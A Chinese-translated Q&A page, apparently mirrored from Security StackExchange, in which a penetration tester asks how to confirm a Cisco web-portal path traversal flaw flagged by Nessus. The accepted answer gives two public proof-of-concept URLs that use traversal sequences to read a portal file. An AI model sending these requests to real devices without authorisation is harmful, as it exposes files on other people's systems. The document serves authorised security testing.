首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >Cisco设备指纹分析

Cisco设备指纹分析
EN

Security用户
提问于 2021-07-30 16:48:25
回答 1查看 317关注 0票数 0

我使用Nessus来确定客户的Cisco容易受到只读路径遍历漏洞的攻击。到目前为止,我已经尝试查看登录门户页面源代码、nmap -sV -A <host>、nmap脚本http-cisco-anyconnectssh -vvv -p port <host>,而没有获得有关设备、其操作系统或修补程序状态的任何信息。

思科提供的咨询意见如下:

这项工作是外部渗透测试的一部分,我无法从他们的内部网络访问该设备。

有人能提供其他技术来获取设备信息或描述我如何构造带有路径遍历字符的HTTP请求,以确认此设备易受攻击吗?

EN

回答 1

Security用户

回答已采纳

发布于 2021-07-30 19:28:34

有一些概念URL的公开发布证明可用于测试此漏洞:

代码语言:javascript
复制
https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

代码语言:javascript
复制
https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
票数 0
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/253807

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档